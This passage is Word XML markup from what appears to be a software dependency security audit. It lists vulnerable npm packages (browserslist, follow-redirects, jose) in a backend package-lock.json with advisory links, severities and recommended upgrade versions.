                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="57" name="Graphic 57"/>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8.774999pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15709696;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape44" coordorigin="1440,175" coordsize="2880,0" path="m1440,175l4320,175e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>75</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId134">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/advisories/GHSA-56x4-j7p9-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>fcf9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId135">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/advisories/GHSA-v78c-4p63-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>2j6c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>77</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId136">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/path-parse/1.0.6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId137">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/yargs-parser/2.4.1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>79</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId138">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-23364</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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020"/>
        <w:gridCol w:w="6620"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1259" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="99"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"browserslist"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="31"/>
              <w:ind w:left="693"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>4.16.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="33"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>browserslist</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.21.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2140" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="111"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>follow-redirects@ 1.14.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="111"/>
              <w:ind w:right="1498"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-11"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-11"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Sensitive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Disclosure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="210" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"dependencies"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
              <w:ind w:right="2018" w:firstLine="593"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"follow-redirects"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>1.14.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>follow-redirects</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.15.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2440" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="116"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId139">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>jose@2.0.5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="116"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>8182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="38"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"jose"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
              <w:ind w:right="3106" w:firstLine="593"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>version</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>2.0.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-14"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-14"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-14"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>jose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-14"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.11.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
